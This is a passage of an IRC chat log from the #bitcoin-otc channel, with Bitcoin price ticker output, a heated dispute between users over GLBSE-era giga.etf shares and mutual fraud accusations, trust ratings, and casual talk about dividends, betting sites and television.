22:15:12 like, you know, mpex. Feb 28 22:15:15 The 7000 bitcoin is right next to the 1 bitcoin Feb 28 22:15:17 I noticed that. Feb 28 22:16:00 weird that its not filling at all really Feb 28 22:16:05 wonder if ordering if fucked up Feb 28 22:16:11 there's only like 100 coins for sale under 33 Feb 28 22:16:16 or the bots just are in wait in see mode Feb 28 22:16:17 ;;goxlag Feb 28 22:16:18 75.78574 seconds Feb 28 22:16:21 oh Feb 28 22:16:24 my Feb 28 22:16:25 god Feb 28 22:16:35 ;;ticker Feb 28 22:16:36 BTCUSD ticker | Best bid: 32.00000, Best ask: 32.01371, Bid-ask spread: 0.01371, Last trade: 32.00000, 24 hour volume: 121637.16767579, 24 hour low: 30.90120, 24 hour high: 34.51541, 24 hour vwap: 32.58503 Feb 28 22:16:37 you called? :P Feb 28 22:16:49 derping. Feb 28 22:16:55 i mean dropping Feb 28 22:17:07 clark moody has it at 32.92 Feb 28 22:17:08 Ukto, shoudlnt you be working on The Next Big Thing tm? Feb 28 22:17:21 Bugpowder i see it down to 31 Feb 28 22:17:27 lunch break Feb 28 22:17:31 word Feb 28 22:17:32 32.06 was last on clark moody Feb 28 22:17:52 http://bitcoincharts.com/charts/chart.png?width=940&m=mtgoxUSD&SubmitButton=Draw&r=2&i=&c=0&s=&e=&Prev=&Next=&t=S&b=&a1=&m1=10&a2=&m2=25&x=0&i1=&i2=&i3=&i4=&v=1&cv=0&ps=0&l=0&p=0& Feb 28 22:17:57 it gapped down at any rate. Feb 28 22:18:02 yea Feb 28 22:18:08 funny cause earlier ppl were buying calls. Feb 28 22:18:27 sounds like a big long distance bill Feb 28 22:18:35 yeah some healthy sell volume. Feb 28 22:18:39 it'll go back up Feb 28 22:19:12 just give the bots an hour or two to resituate Feb 28 22:19:41 hey mircea_popescu, how come you didn't own any Gigamining when GLBSE close? Feb 28 22:19:57 *closed Feb 28 22:20:04 i dunno. how come you're beating your wife ? Feb 28 22:20:09 I think I just saw a bomb get dropped Feb 28 22:20:27 mircea_popescu that would go against your giga.etf contract, would it not? Feb 28 22:21:00 you beating your wife you mean ? Feb 28 22:21:08 not rly. i don't include people's wives in contracts. Feb 28 22:21:22 why are you evading a direct question? Feb 28 22:21:24 err Feb 28 22:21:33 because it's a loaded question, and a poorly loaded one at that. Feb 28 22:21:36 mircea_popescu: did you not actually own giga shares to back it? x.x Feb 28 22:21:42 course i did Feb 28 22:21:51 yeah, but now the shares are worthless Feb 28 22:21:53 he's running out of air with his various lies, so he's pulling a goat. Feb 28 22:21:55 because giga is fucking investors around Feb 28 22:21:56 which is cute, but hey. Feb 28 22:22:22 mircea_popescu, every person that own over 900 contracts has claimed and been paid Feb 28 22:22:46 so it would seem that your position is weakening Feb 28 22:22:51 gigavps here's the thing : this sort of fake drama x months late won't save you from the fact that you've taken about 40k worth of investor's btc Feb 28 22:22:53 hmm, this is a pretty serious accusation Feb 28 22:22:53 http://www.youtube.com/watch?v=73vGdCaC048 Feb 28 22:22:55 which is nowhere to be see. Feb 28 22:23:00 we've been over all this like 69x Feb 28 22:23:10 not getting into the details of pushing pirate, pushing amazingrando, pushing all the other scams. Feb 28 22:23:17 alright, there is obviously only one easy way to settle this Feb 28 22:23:20 so, find something better to do with your time. like, say, a way to pay back. Feb 28 22:23:24 lambert at least is trying. Feb 28 22:23:27 mircea_popescu the ice you are standing on is cracking Feb 28 22:23:31 ahaha Feb 28 22:23:32 right-o. Feb 28 22:23:32 lets send an open email to james/nefario asking him to confirm MP's claim Feb 28 22:23:36 mircea_popescu: guess what came out Feb 28 22:23:38 foundation 4 Feb 28 22:23:44 they fixed basically every single thing I bitched about Feb 28 22:23:53 maybe they were listening Feb 28 22:23:59 maybe Feb 28 22:24:02 a lot of people were bitching Feb 28 22:24:10 Ukto nefario, the scammertagged chav from bitcointalk you mean ? Feb 28 22:24:24 they switched to zepto.js for their js (although to be fair, none of their js was REQUIRED to be used, it was purely optional) Feb 28 22:24:29 heh yes, the person who has been giving out accurate information Feb 28 22:24:35 zepto > query by a shitload Feb 28 22:24:35 he has no reason to lie Feb 28 22:24:45 Ukto i can dig up the logs for some accurate info he gave, if you're interested. Feb 28 22:25:03 hey, I am just trying to help Feb 28 22:25:16 i have never owned shares of giga/etf Feb 28 22:25:25 just dont like seeing false accusations fly. Feb 28 22:25:35 shouldnt be hard to get proof otherwise Feb 28 22:25:54 a word of waring to all, mircea_popescu doesn't live up to his own contracts Feb 28 22:26:14 here's a start : nefario makes "conference". nobody goes, but hey. Feb 28 22:26:15 Sep 16 01:13:36 mircea_popescu: would you like me to mention you or mpex? Feb 28 22:26:15 Sep 16 01:14:01 no. Feb 28 22:26:25 end result ? nefario explains the idiots present how much of a scam mpex is. Feb 28 22:26:30 lalala. has no reason to lie indeed. Feb 28 22:26:41 gigavps your cheek is incredible. Feb 28 22:26:52 you are insolvent talking about ice under me !? Feb 28 22:26:59 eh.. honestly, nefario has made some shit decisions, we all agree with that Feb 28 22:26:59 you've fucked over your investors, talking about my contracts ? Feb 28 22:27:02 piss off scammer Feb 28 22:27:07 Usage: IGNORE mask - host mask to ignore, eg: *!*@*.aol.com types - types of data to ignore, one or all of: PRIV, CHAN, NOTI, CTCP, DCC, INVI, ALL options - NOSAVE, QUIET Feb 28 22:27:07 lol Feb 28 22:27:09 Ignore on gigavps!*@* changed. Feb 28 22:27:14 but even ppl he has had disagreements with like Diablo-D3 has gotten accurate info Feb 28 22:27:15 ;;eauth mircea_popescu Feb 28 22:27:16 Request successful for user mircea_popescu, hostmask mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu. Get your encrypted OTP from http://bitcoin-otc.com/otps/8A736F0E2FB7B452 Feb 28 22:27:47 ;;everify freenode:#bitcoin-otc:88727e3706f37e445789b628889e38b864a9257925711655a385f20f Feb 28 22:27:48 You are now authenticated for user mircea_popescu with key 8A736F0E2FB7B452 Feb 28 22:28:07 and honestly, i dont see what reason gigavps has to lie about it. other than just wanting to bully and pick on you to keep your shares? Feb 28 22:28:13 Ukto: yeah, I think Im the only one that got that level of treatment Feb 28 22:28:29 ;;rate gigavps -10 Defrauded direct investors of something like 40k BTC. Lied about pretty much everything, changed his contract. Also one of the main pirate ponzi supporters. Feb 28 22:28:32 Rating entry successful. Your rating of -10 for user gigavps has been recorded. Feb 28 22:28:32 Giga, did you even have the hash power to back up your dividend payout?? I seem to remember not Feb 28 22:28:40 all the other giga share holoders I know who claimed got theirs Feb 28 22:28:51 ok Feb 28 22:29:34 Ukto at the very minimum trying to get this false theory accepted whereby people actually claimed. Feb 28 22:29:34 i dont see how giga doing smth potentially wrong could be related to mp doing smth potentially wrong Feb 28 22:30:17 heh, I just want to solve the issue before it become some crazy drama Feb 28 22:30:26 BEFORE? Feb 28 22:30:27 the issue is solved. Feb 28 22:30:44 and in general, scammers may get away with it cause i don't care Feb 28 22:30:45 is giga's nick registered? how do you check that? Feb 28 22:30:54 but if they start being uppity, they'll get bitchslapped. Feb 28 22:30:58 simple thing to understand. Feb 28 22:31:09 i think the biggest issue regardless Feb 28 22:31:16 is GLBSE's failure Feb 28 22:31:17 ;;ticker Feb 28 22:31:17 BTCUSD ticker | Best bid: 33.03000, Best ask: 33.29995, Bid-ask spread: 0.26995, Last trade: 33.01234, 24 hour volume: 123154.64224059, 24 hour low: 30.90120, 24 hour high: 34.51541, 24 hour vwap: 32.59041 Feb 28 22:31:32 because it comes down to your word vs GLBSE & Issuer's word Feb 28 22:31:47 right. Feb 28 22:31:49 cool, just wanted to make sure it was the one true giga Feb 28 22:32:08 que up the retaliation ratings Feb 28 22:32:58 Nick 'gigavps', with hostmask 'gigavps!~me@rrcs-97-79-110-50.se.biz.rr.com', is not identified. Feb 28 22:33:07 heh Feb 28 22:33:11 not very reassuring :P Feb 28 22:33:41 Nick 'gigavps', with hostmask 'gigavps!~me@rrcs-97-79-110-50.se.biz.rr.com', is identified as user gigavps, with GPG key id F83554D76ADE3A3F, key fingerprint C4D30ACE7ACB2C16BCE9FD55F83554D76ADE3A3F, and bitcoin address None Feb 28 22:34:02 i suppose that works :P Feb 28 22:34:23 ;;rated gigavps Feb 28 22:34:23 You rated user gigavps on Fri Aug 17 15:27:07 2012, giving him a rating of 10, and supplied these additional notes: Excellent trust. Feb 28 22:36:26 well why would he want to deal with that nitwit anyway? Feb 28 22:36:30 what would be the point? Feb 28 22:36:59 bah. this is old news giga Feb 28 22:37:13 gigaetf had no value Feb 28 22:37:26 it became illiquid too Feb 28 22:38:22 this drama seems rota-ish Feb 28 22:38:42 how about this Feb 28 22:38:59 mircea_popescu: can you provide the btc address/email address used for glbse Feb 28 22:39:03 http://www.theverge.com/2013/2/28/4032718/apple-deleting-icloud-emails-containing-barely-legal-teen Feb 28 22:39:06 let nefario make the statement weather the shares existed or noit Feb 28 22:39:12 jcpham: NO Feb 28 22:39:13 and then the etf holders can deal with nefario Feb 28 22:39:17 and not gigavps Feb 28 22:39:21 and all is settled Feb 28 22:39:41 Ukto no. Feb 28 22:39:41 Ukto: not nefario Feb 28 22:39:47 whoever issued the passthrough Feb 28 22:39:50 i pre de-nominamte myself Feb 28 22:40:01 0,o Feb 28 22:40:07 the passthrough owner is on the hook for it, not giga or nefari Feb 28 22:40:07 well Feb 28 22:40:09 at this point Feb 28 22:40:18 its an issue between MP and glbse Feb 28 22:40:52 bullshit Feb 28 22:40:59 no. at this point it's an issue between some idiot who thinks he can deflect attention from his misdealings by starting shit with me and the world. Feb 28 22:41:37 the time for this sort of putative implication was last year, Feb 28 22:41:38 these scammers are like wack-a-mole Feb 28 22:41:46 not now that it became clear bfl isn't delivering Feb 28 22:42:03 you defrauded your investors gigavps Feb 28 22:42:06 mircea_popescu: so if mpex says I dont own shares of sdice, I sue Erik for my missing shares? >,> Feb 28 22:42:40 blackmailed them into submitting OFAC requests Feb 28 22:42:50 with id etc Feb 28 22:42:58 Ukto no. on mpex you have receipts Feb 28 22:43:04 you can prove what's what. Feb 28 22:44:02 [HAVELOCK] [KCIM] 1 @ 0.99 BTC [-] Feb 28 22:44:05 mircea_popescu: f.giga.etf held the underlying asset at time of glbse closing [ ] Yes [ ] No Feb 28 22:44:11 that's all Feb 28 22:44:15 yes. Feb 28 22:45:02 [HAVELOCK] [SDICE] 1 @ 0.6889999 BTC [-] Feb 28 22:45:32 that said, i did not hold it directly, i never had a GLBSE acct. Feb 28 22:45:48 that said, there's no doubt in my mind the proper qtys were actually beingheld for me. Feb 28 22:45:50 mircea_popescu: sure, but if mpex went away in an instant Feb 28 22:45:53 and I have a buy receipt Feb 28 22:45:59 and delete my sell receipt Feb 28 22:46:03 its now you word aginst mine Feb 28 22:46:04 right Feb 28 22:46:04 ? Feb 28 22:46:17 no different than glbse Feb 28 22:46:18 Ukto in principle there'd be at the very least a decoded db dump Feb 28 22:46:18 newest receipt wins I think Feb 28 22:46:31 but even if that's not the case : the trade history is public, Feb 28 22:46:38 are they constantly backed up offsite out of your control ? Feb 28 22:46:38 [BTCTC] [BTC-BOND] 3 @ 0.01 = 0.03 BTC [+] Feb 28 22:46:38 and you can match up what's what. Feb 28 22:46:46 ah Feb 28 22:46:54 yes. http://mpex.co/faq.html#22 Feb 28 22:47:23 the catastrophic failure mode is for each issuer to get a gpg-encypted list of the holder's fingerprints. much like rg got on the delisting of s.bvps Feb 28 22:47:40 this can just be a pastebin if it comes to it Feb 28 22:51:45 is that a question? Feb 28 22:51:49 seems more of a statement Feb 28 22:52:44 is what a question Feb 28 22:52:51 what is a word Feb 28 22:53:03 he is asking if mircea_popescu owned the mircea_popescu account on glbse Feb 28 22:53:06 ffs Feb 28 22:53:13 spam detected Feb 28 22:53:18 herpderp Feb 28 22:53:50 i don't own a mircea_popescu account on icbit.se either, since we're talking Feb 28 22:53:54 i don't have a mtgox acct Feb 28 22:53:58 and on it goes. Feb 28 22:54:31 so he did have them? Feb 28 22:54:38 its certainly not like mircea_popescu is known for employing lackeys for that kind fo thing Feb 28 22:54:41 maybe the person he had manage the account decided to make an account as his name? Feb 28 22:55:18 maybe it was mp and he's just fucking with you Feb 28 22:55:55 maybe we'd best focus on how many people got separated from their residual btc because they didn't want to cough up for whatever apositlle bs Feb 28 22:56:03 and break whatever local laws in the process. Feb 28 22:56:58 oooh 4k btc sooo much Feb 28 22:57:07 smh Feb 28 22:57:19 ;;ticker Feb 28 22:57:21 BTCUSD ticker | Best bid: 33.12357, Best ask: 33.31649, Bid-ask spread: 0.19292, Last trade: 33.12257, 24 hour volume: 124639.50823768, 24 hour low: 30.90120, 24 hour high: 34.51541, 24 hour vwap: 32.60481 Feb 28 22:57:30 well at least the drama worked, price back up. Feb 28 22:57:49 so mircea_popescu on glbse was not the mircea_popescu that is chatting in this channel? Feb 28 22:58:14 well thats good at lesat Feb 28 22:58:26 as I said, bots just needed time to resituate after a selloff Feb 28 22:58:39 it wasn't even much of a selloff. 5k ? Feb 28 22:58:45 15 Feb 28 22:58:48 maybe things are a lot more fragile than the bull run past week suggests Feb 28 22:59:06 Just one person dumping Feb 28 22:59:15 I think Feb 28 22:59:22 it happened so fast, must have been Feb 28 22:59:36 no one wants to answer my question? lol Feb 28 22:59:37 retracement Feb 28 22:59:50 little bit of profits are needed somewhere in the mix Feb 28 22:59:53 then onwards and upwards Feb 28 23:00:34 wake me up if it breaks past 27.5 Feb 28 23:00:41 you mean under ? Feb 28 23:00:44 right Feb 28 23:00:51 lol Feb 28 23:00:58 hm, how accurate is blockchain.info when calcing the fees ? Feb 28 23:06:26 If all of the shareholders with over 900 shares have claimed, it sounds like whomever claimed the 900 shares of MP's on behalf of MP owes the passthru shareholders some BTC? Feb 28 23:07:23 Yeah, I was operating on the assumption that he was being honest when he answered the question of ownership. Feb 28 23:07:35 burnside this if we trust nefario Feb 28 23:08:17 and for that matter, if we trust gigavps. Feb 28 23:08:22 both appear very dubious atm. Feb 28 23:08:27 heh, the twisted web we weave. Feb 28 23:08:59 *tangled web Feb 28 23:09:13 that too Feb 28 23:09:28 but pro memoria : Feb 28 23:09:44 mircea_popescu did you claim you account after glbse closed? Feb 28 23:09:57 of whoever was on mpex behalf Feb 28 23:10:06 *of->or Feb 28 23:10:13 Oh! what a tangled web we weave Feb 28 23:10:20 When first we practice to deceive! Feb 28 23:10:21 i didn't have an account to claim and i trust the op to not have claimed gigavps. Feb 28 23:10:31 what? Feb 28 23:10:35 1. very dubious character noteworthy mostly for being detained at the border takes exchange down, which nets him a scammer tag. Feb 28 23:10:38 you didnt have an account? Feb 28 23:10:44 so someone else claimed the shares on your behalf? Feb 28 23:10:47 2. some lists of shareholders are issued. these are wrong. Feb 28 23:10:47 er bought them ? Feb 28 23:11:02 3. some more lists are issued. these are right, they say. Feb 28 23:11:16 by now it's been about 3-4 months, and all this communication happened over email in plain text. Feb 28 23:11:26 it would not surprise me if any of the three were the case : Feb 28 23:11:39 a. nefario waited to see what's nto claimed, released lists including himself as beneficiary. Feb 28 23:11:48 b. someone eavesdropped successfully, made claim. Feb 28 23:12:19 c. gigavps is simply lieing (if nothing else for the simple interest that a 5 to 10% claim rate isn't something he'd like to admit) Feb 28 23:13:02 Sure, those are all reasonable Feb 28 23:13:07 now, all these may be or may not be true, tho i lean towards thinking at least one probably is. Feb 28 23:13:15 I am curious now that you mentioned it Feb 28 23:13:26 this state of affairs does NOT give some confused individual license to come in here and ask loaded questions implying i did something wrong. Feb 28 23:13:29 did you yourself not actually have a GLBSE account and hold 900 shares? Feb 28 23:13:38 he is welcome to appologise to me at any time for being an idiot and involving himself in this mess, Feb 28 23:13:42 not that it'd make a difference, Feb 28 23:14:00 just as he's welcome to appologise to other people for involving them in the other many messes he's created since his presence in bitcoin Feb 28 23:14:11 but all this is not here nor there, and certainly has no point in our discussion. Feb 28 23:14:25 [BTCTC] [BTC-BOND] 3 @ 0.01 = 0.03 BTC [+] Feb 28 23:14:28 he said he 'didnt have an account to claim' Feb 28 23:14:33 Ukto i use brokers. i happen to think it's the correct way to do it. Feb 28 23:14:38 so there mustve been an imposter on glbse with mircea_popescu 's name? Feb 28 23:14:42 ah Feb 28 23:15:08 but in your contract you didnt disclose that you held the shares via third party, right? Feb 28 23:15:23 MP is the OP for the etf asset, right? Feb 28 23:15:28 it was amply disclosed here for instance. Feb 28 23:15:41 then that makes things simple Feb 28 23:15:48 can we get the third party to vrify your shares? Feb 28 23:16:09 Ukto the problem is people work in bitcoin because they want to be anon. Feb 28 23:16:16 for many people being involved in these things is professionally iffy Feb 28 23:16:31 um Feb 28 23:16:42 you can lose your license as a stock broker for instance. Feb 28 23:16:53 is it likely ? no. is it a risk people would run ? hell no. Feb 28 23:16:56 so your saying, that you used a 3rd party to buy the shares, and this person cannot be revealed? Feb 28 23:17:10 and that this person is a licensed stock broker? Feb 28 23:17:16 http://web.archive.org/web/20121124181409/http://polimedia.us/bitcoin/mpex.php?mpsic=F.GIGA.ETF Feb 28 23:17:19 i'm not saying anything of the sort. Feb 28 23:17:29 wondering what the commentary is for then Feb 28 23:17:45 leaves the basic question again, can we hav this third party simply verify things? Feb 28 23:17:52 it will not happen. Feb 28 23:17:53 "Yes, I held 900 shares of giga for MP" Feb 28 23:18:04 Reason ? Feb 28 23:18:09 there's no reason for a reason. Feb 28 23:18:22 nobody can suddenly decide "hey, i want your id" Feb 28 23:18:24 well, the issuer is claiming the shares didnt exist Feb 28 23:18:27 sounds like a reason :P Feb 28 23:18:36 issuer can claim w/e the fuck he pleases. Feb 28 23:18:50 once his cratered asset is worth something, the people holding it on mpex might be able to recover something Feb 28 23:18:52 i just think its sad that you wont clear your name if its that easy :( Feb 28 23:18:53 as it is... heh. Feb 28 23:19:01 Ukto i happen to respect anonimity. Feb 28 23:19:06 alot of ppl respect you Feb 28 23:19:09 and if im the only one here, that's great, i don't care. Feb 28 23:19:16 and while they should continue to Feb 28 23:19:24 its still best to show good faith in that respect Feb 28 23:19:26 but this is a forewarning of things to come : i don't care what people manouver, Feb 28 23:19:35 i won't reveal jack shit as a matter of going concern. Feb 28 23:19:59 you don't get to spy on people just by manufacturing some concern trollage. Feb 28 23:21:08 heh Feb 28 23:21:13 well Feb 28 23:21:16 I give up Feb 28 23:21:28 I was just trying to be helpfull and make sure you got a clear name and everyone knew that giga was wrong Feb 28 23:21:30 you obviously dont care Feb 28 23:21:32 thanks for playing. Feb 28 23:21:58 back to business as usual then. :) Feb 28 23:22:34 where were we? Feb 28 23:22:46 ;;ticker Feb 28 23:22:46 BTCUSD ticker | Best bid: 33.27001, Best ask: 33.33000, Bid-ask spread: 0.05999, Last trade: 33.33000, 24 hour volume: 125332.84318558, 24 hour low: 30.90120, 24 hour high: 34.51541, 24 hour vwap: 32.61138 Feb 28 23:22:49 there Feb 28 23:22:52 33land lol Feb 28 23:22:55 ah yes Feb 28 23:23:00 A Palmer too! No wonder why Feb 28 23:23:08 I felt rebuked beneath his eye.[ Feb 28 23:24:33 Lyspooner == limerick king from zh? Feb 28 23:25:11 that guy is hilarious Feb 28 23:27:04 [MPEX] [S.DICE] 1485 @ 0.00637777 = 9.471 BTC [+] Feb 28 23:33:42 kakobrekla you know i just realised romanian YEARLY salary is like 100 btc Feb 28 23:34:05 hm Feb 28 23:34:24 unfair comparison Feb 28 23:35:08 romanian median yearly BTC salary is zero Feb 28 23:36:39 whats up everyone Feb 28 23:36:47 hater. Feb 28 23:37:31 mjr_ AAPL Feb 28 23:38:17 doubtful Feb 28 23:38:40 down -3.17 Feb 28 23:38:52 AAPL is always down Feb 28 23:39:11 "what happens to bitcoin if the internet stops working?"... apparently if we look at romania where there still is no internet, there is at least one node, and that node becomes very wealthy Feb 28 23:39:21 AAPL Shall rise again! Feb 28 23:39:32 Lyspooner literally the stuff involved in bitcoin could be done pen on paper Feb 28 23:39:40 it'd take an army of slaves doing it, but it'd be done just fine. Feb 28 23:39:48 mircea_popescu that is true Feb 28 23:40:05 http://www.usatoday.com/story/news/nation/2013/02/28/girls-gone-wild-bankruptcy/1954419/ 'Girls Gone Wild' goes bankrupt to dodge legal awards Feb 28 23:40:31 mircea_popescu: i just wanted to make fun of romania Feb 28 23:40:45 but you suck so badly at it! Feb 28 23:41:42 dude i love blogging. there's all these people making comments. Feb 28 23:41:53 TIL that most ycombinator ventures use godaddy as a registrar. Feb 28 23:42:49 mircea_popescu you just closed -eu 1 min too soon Feb 28 23:43:13 o ? Feb 28 23:43:38 22:34.06 .•• mircea_popescu ( ~Mircea@pdpc/supporter/silver/mircea-popescu ) left #bitcoin-otc-eu ( "Leaving" ) Feb 28 23:43:38 22:37.07 .•• allex ( bd6eb8e7@gateway/web/freenode/ip.189.110.184.231 ) joined #bitcoin-otc-eu Feb 28 23:43:38 22:37.15 ( allex ) Hello Feb 28 23:43:38 22:37.43 ( allex ) I need some traders to join my p2p bitcoin exchange site Feb 28 23:43:38 22:38.01 ( allex ) the name of the site is Feb 28 23:43:40 22:38.03 ( allex ) http://www.p2pbitexchange.com Feb 28 23:43:40 22:39.39 ( kakobrekla ) what scam is this now Feb 28 23:43:44 wasnt your post 2nd on google like a few hours ago? Feb 28 23:43:53 for 'ycombinator' Feb 28 23:43:54 22:40.22 ( allex ) ? Feb 28 23:43:54 22:40.32 ( allex ) haha isnt a scam Feb 28 23:43:54 22:41.15 ( allex ) there is no midle man (as it were) involved. Only p2p Feb 28 23:43:54 22:42.12 ( allex ) Feb 28 23:43:54 22:43.47 ( kakobrekla ) how is it better than irc and -otc wot allex Feb 28 23:44:32 ThickAsThieves yeah Feb 28 23:44:36 gone Feb 28 23:44:46 aww! Feb 28 23:45:07 coinlab called up Brin Feb 28 23:45:14 was like yo axe that shit Feb 28 23:45:53 i have to say that godaddy's superbowl commercial and subsequent ad campaign was probably the most successful campaign of any internet company Feb 28 23:46:07 ThickAsThieves http://www.google.com/search?q=Ycombinator&complete=0&tbs=qdr:d Feb 28 23:46:10 i still see it. you don't ? Feb 28 23:46:26 mjr_ that may be, but they suck at the actual soup. Feb 28 23:46:38 definitely Feb 28 23:46:40 they are the worst Feb 28 23:46:43 i use namecheap Feb 28 23:46:49 i don't see it Feb 28 23:46:51 kakobrekla well... wait till he finds about localbitcoins or w/e its called Feb 28 23:46:53 but still, why does everyone use them, when it is known that they suck Feb 28 23:46:56 jurov i use nc too. Feb 28 23:47:04 and imo they're so far ahead of anyone in their field it's rare. Feb 28 23:47:07 22:44.14 ( allex ) The idea is to build a comunity of trders Feb 28 23:47:07 22:44.23 ( allex ) once again only P2P Feb 28 23:47:07 22:44.47 ( allex ) to build trust Feb 28 23:47:07 22:45.02 ( allex ) by rating the trades Feb 28 23:47:07 22:45.32 ( allex ) the focus is on exchange of bitcoins only nothing else Feb 28 23:47:08 22:46.13 ( allex ) There is groups os paypal, nettler , poker , cash , western union Feb 28 23:47:09 22:46.37 ( allex ) Got the idea? Feb 28 23:47:17 prolly built the site firt then come to -ot Feb 28 23:47:18 c Feb 28 23:47:23 first* Feb 28 23:47:28 kakobrekla see how lucky you are he's enlightening you ? Feb 28 23:47:49 ask him if he's romanian. Feb 28 23:47:53 he sounds like 100 btc / year. Feb 28 23:48:18 meh Feb 28 23:48:29 im le tierd from those kind of conversations. Feb 28 23:49:05 im lucky. i think i have a reputation for an asshole, so most fragile minds avoid me or something. Feb 28 23:49:26 when you link, yes Feb 28 23:49:31 dont push it, ill send him here Feb 28 23:49:32 i see it Feb 28 23:49:40 but when i use URL bar to search, no Feb 28 23:49:53 whatever the hell reason that is Feb 28 23:50:09 it gives me much more sensible listings Feb 28 23:50:14 like their home page Feb 28 23:50:22 and wikipedia, etc Feb 28 23:51:51 ThickAsThieves it's 24 hours Feb 28 23:51:57 not any time Feb 28 23:52:09 &tbs=qdr:d that's what it does. Feb 28 23:52:10 Error: "tbs=qdr:d" is not a valid command. Feb 28 23:52:17 saywut ?! Feb 28 23:52:19 &ticker Feb 28 23:52:20 BTCUSD ticker | Best bid: 33.60000, Best ask: 33.69300, Bid-ask spread: 0.09300, Last trade: 33.60000, 24 hour volume: 126392.80990105, 24 hour low: 30.90120, 24 hour high: 34.51541, 24 hour vwap: 32.62583 Feb 28 23:52:22 aHAHAHA Feb 28 23:52:27 nice Feb 28 23:52:32 today we learn to hax BOTH google and gribble. Feb 28 23:52:52 &estimate Feb 28 23:52:54 Next difficulty estimate | 4413018.97089 based on data since last change | 4676975.06762 based on data for last three days Feb 28 23:53:04 is this even documented anywhere ?! Feb 28 23:53:08 now i only have to hit two keys at once! Feb 28 23:53:11 hehe Feb 28 23:53:25 &!estimate Feb 28 23:53:26 Error: "!estimate" is not a valid command. Feb 28 23:53:37 ;;&estimate Feb 28 23:53:38 Error: "&estimate" is not a valid command. Feb 28 23:53:44 &bitchslap Feb 28 23:53:45 &;;estimate Feb 28 23:53:45 Error: "bitchslap" is not a valid command. Feb 28 23:53:45 Error: ";;estimate" is not a valid command. Feb 28 23:53:50 &slap bitch Feb 28 23:54:04 totally. Feb 28 23:54:19 &ticker Feb 28 23:54:20 BTCUSD ticker | Best bid: 33.66100, Best ask: 33.68999, Bid-ask spread: 0.02899, Last trade: 33.66100, 24 hour volume: 126401.21754295, 24 hour low: 30.90120, 24 hour high: 34.51541, 24 hour vwap: 32.62637 Feb 28 23:54:42 undocumented feature for realz Feb 28 23:54:44 &roulette Feb 28 23:54:45 *click* Feb 28 23:54:55 awesome. Feb 28 23:55:03 &easteregg Feb 28 23:55:04 Error: "easteregg" is not a valid command. Feb 28 23:55:06 boo Feb 28 23:55:18 $ticker Feb 28 23:55:33 you broke it Feb 28 23:55:35 hehe Feb 28 23:59:18 did people get the right asicminer test payment? Feb 28 23:59:29 they seem to have missed a 0 of mine Feb 28 23:59:42 didn't they testy with 1 satoshi first Feb 28 23:59:47 and then send the real deal, like 2.35% ? Feb 28 23:59:55 they sent already Mar 01 00:00:01 its done Mar 01 00:00:08 fucking china Mar 01 00:00:26 friedcat will posting more deets after his nap Mar 01 00:02:24 http://bitbet.us/bet/131/btc-will-have-a-new-highest-price-in/ Mar 01 00:02:32 what was the actual payment per share? Mar 01 00:02:35 resolved. who'd have thunk it will be february seriously. Mar 01 00:02:47 this is lulzy Mar 01 00:03:06 dub Feb 28 20:46:46 Got my asicminer div. 0.0023544 BTC per share. Mar 01 00:03:23 ok actual payment was good Mar 01 00:03:26 mircea_popescu: according to your permanent plateau article, you would've thunk it Mar 01 00:03:37 I only got 0.1 satoshi per share int eh test though Mar 01 00:03:38 Lyspooner yeah. Mar 01 00:03:57 dub weren't all payments = 1 satoshi irrespective of shares ? just to check addy Mar 01 00:04:00 I DEMAND MY ADDITIONAL SATOSHIS Mar 01 00:04:15 mircea_popescu: no, mine was missing a zero Mar 01 00:04:43 oh wait Mar 01 00:04:58 wat? Mar 01 00:05:01 lmao. so now we know you have 10 shares ? Mar 01 00:05:08 no Mar 01 00:05:12 try to keep up Mar 01 00:05:26 dub they did a test first Mar 01 00:05:27 also how the fuck do you send 0.1 satoshi ? ;) Mar 01 00:05:33 1 satoshi x shares you own Mar 01 00:05:42 then they did payout Mar 01 00:05:43 you had 10 shares got 1 satoshi computed per share div. right ? Mar 01 00:05:45 yes, except in my case they didnt Mar 01 00:05:50 no Mar 01 00:05:55 my theory ;/ Mar 01 00:05:58 I got 0.1 satoshi per share Mar 01 00:06:16 did you get correct divs? Mar 01 00:06:20 yes Mar 01 00:06:28 let's get the pitchforks then Mar 01 00:06:34 my carefactor is 0.00001 Mar 01 00:06:40 except its kinda retarded of them Mar 01 00:07:28 one thing i love about bitbet Mar 01 00:07:29 one retarded action begets another Mar 01 00:07:34 is when i forget that i bet on something Mar 01 00:07:37 and the money comes in Mar 01 00:08:31 i guess it makes a pretty decent gift too Mar 01 00:09:35 this fucking thread Mar 01 00:09:43 yes it's nice... now if i could learn to make acceptable bets :/ Mar 01 00:09:57 I wanna buy 2.7 shares please PM me its srs bsns Mar 01 00:10:18 with coinlab it's hard cause nobody knows what they're even doing/wanna do Mar 01 00:10:49 i was thinking, a good round of bets might be for those tv competition shows Mar 01 00:10:53 jurov yeah srsly i don't think it's your fault Mar 01 00:10:57 like who will win Top Chef Mar 01 00:11:03 Top Model, etc Mar 01 00:11:06 ThickAsThieves that's a point yea Mar 01 00:11:25 http://bitbet.us/bet/39/network-difficulty-under-6-million/ Mar 01 00:11:26 I like the fatest americans show Mar 01 00:11:36 i find this incredible. 3:2 srsly ?! Mar 01 00:11:47 how the fuck is output growing 50% in three weeks Mar 01 00:11:52 biggest loser Mar 01 00:12:11 ha i bet on ttaht one too and didnt remember Mar 01 00:12:12 This is why nobody buys my XDIFFMAR Mar 01 00:12:15 like Mar 01 00:12:19 damn Mar 01 00:12:31 only 15 btc total... Mar 01 00:12:35 its pretty much teh only tv I watch, gf calls out 'fatties are on' and I run Mar 01 00:12:55 Survivor Mar 01 00:12:58 thats a good one Mar 01 00:13:06 for betting Mar 01 00:13:25 nah, I want to kill americans if I watch that Mar 01 00:13:26 the last i saw something on tv tiffani amber thiessen was like 17 Mar 01 00:13:35 and pretty hawt at that. Mar 01 00:13:43 the only thing worse than an american is an american out of america Mar 01 00:13:44 she's still pretty hot Mar 01 00:14:05 she play The Perfect Wife on that show White Collar Mar 01 00:14:06 dub: you're not gonna let me live on your couch? Mar 01 00:14:31 Mar 01 00:14:32 wait thats not survivor, im thinking greatest race Mar 01 00:14:55 btw whats the max diff change per diff change Mar 01 00:14:57 horrible show Mar 01 00:14:59 i forgot Mar 01 00:15:02 kakobrekla 400 Mar 01 00:15:06 400 what Mar 01 00:15:09 %? Mar 01 00:15:30 survivor I can't watch because I am basically bear grylls and I want them to die for lack of survival skills Mar 01 00:16:05 amazing race, my wife goes oh we should do that! i'm like, why, these people all wanna kill each other in the end Mar 01 00:16:13 kakobrekla, yes 4x Mar 01 00:16:28 aha Mar 01 00:16:31 ok Mar 